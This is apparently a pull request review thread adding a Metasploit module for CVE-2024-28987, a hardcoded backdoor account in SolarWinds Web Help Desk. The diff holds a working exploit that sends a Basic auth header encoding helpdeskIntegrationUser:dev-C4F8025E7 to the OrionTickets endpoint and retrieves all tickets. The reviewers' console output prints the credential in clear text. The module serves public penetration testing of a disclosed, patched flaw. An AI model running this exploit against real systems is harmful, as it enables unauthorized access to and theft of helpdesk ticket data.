modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb

```diff
@@ -0,0 +1,83 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  prepend Msf::Exploit::Remote::AutoCheck
+  CheckCode = Exploit::CheckCode
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SolarWinds Web Help Desk Backdoor (CVE-2024-28987)',
+        'Description' => %q{
+          This module exploits a backdoor in SolarWinds Web Help Desk <= v12.8.3 to retrieve all tickets from the system.
+        },
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'Zach Hanley' # Discovery & PoC
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-28987'],
+          ['URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987'],
+          ['URL', 'https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2'],
+          ['URL', 'https://www.horizon3.ai/attack-research/cve-2024-28987-solarwinds-web-help-desk-hardcoded-credential-vulnerability-deep-dive/'],
+
+        ],
+        'DisclosureDate' => '2024-08-22',
+        'DefaultOptions' => {
+          'RPORT' => 8443,
+          'SSL' => 'True'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Web Help Desk', '/'])
+      ]
+    )
+  end
+
+  def check
+    @auth = auth
+
+    if @auth.code == 401
+      return Exploit::CheckCode::Safe
+    elsif @auth.code == 200
+      return Exploit::CheckCode::Appears
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def auth
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets'),
+      'headers' => {
+        'Authorization' => 'Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0RjgwMjVFNw=='
+      }
+    )
+    res
+  end
+
+  def run
+    print_status('Authenticating with the backdoor account "helpdeskIntegrationUser"...')
+    @auth ||= auth
+
+    body = @auth.body
+    fail_with(Failure::UnexpectedReply, 'Unexpected Reply: ' + @auth.to_s) unless body.include?('shortSubject')
+
```

Comment:
It'd be great to persist this in the database as a vulnerability, example:

https://github.com/rapid7/metasploit-framework/blob/7b470509b8a5f2a441fb78c8d42defc565d1fc2c/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb#L60-L79

Reply:
I guess technically we should store the credential too?

https://github.com/rapid7/metasploit-framework/blob/7b470509b8a5f2a441fb78c8d42defc565d1fc2c/modules/auxiliary/gather/advantech_webaccess_creds.rb#L126-L151

I'll just run this by the team tomorrow to confirm if it's the convention to register hard-coded app creds into Metasploit's database or not :+1:

Reply:
Thank you for the feedback, I've added `report_service` and `report_vuln`:
```
msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > services 
Services
========

host             port  proto  name                      state  info
----             ----  -----  ----                      -----  ----
192.168.217.145  8443  tcp    solarwinds web help desk  open

msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > vulns -i

Vulnerabilities
===============

Timestamp                Host             Name                                              References                                        Information
---------                ----             ----                                              ----------                                        -----------
2024-09-26 03:56:23 UTC  192.168.217.145  SolarWinds Web Help Desk Backdoor (CVE-2024-2898  CVE-2024-28987,URL-https://www.solarwinds.com/tr  The backdoor helpdeskIntegrationUser:dev-C4F8025
                                          7)                                                ust-center/security-advisories/cve-2024-28987,UR  E7 works.
                                                                                            L-https://support.solarwinds.com/SuccessCenter/s
                                                                                            /article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-
                                                                                            2,URL-https://www.horizon3.ai/attack-research/cv
                                                                                            e-2024-28987-solarwinds-web-help-desk-hardcoded-
                                                                                            credential-vulnerability-deep-dive/
```

Reply:
Did you get any feedback regarding storing the hardcoded credentials as loot?

Reply:
Thanks for the ping; no need to store the creds as loot 💯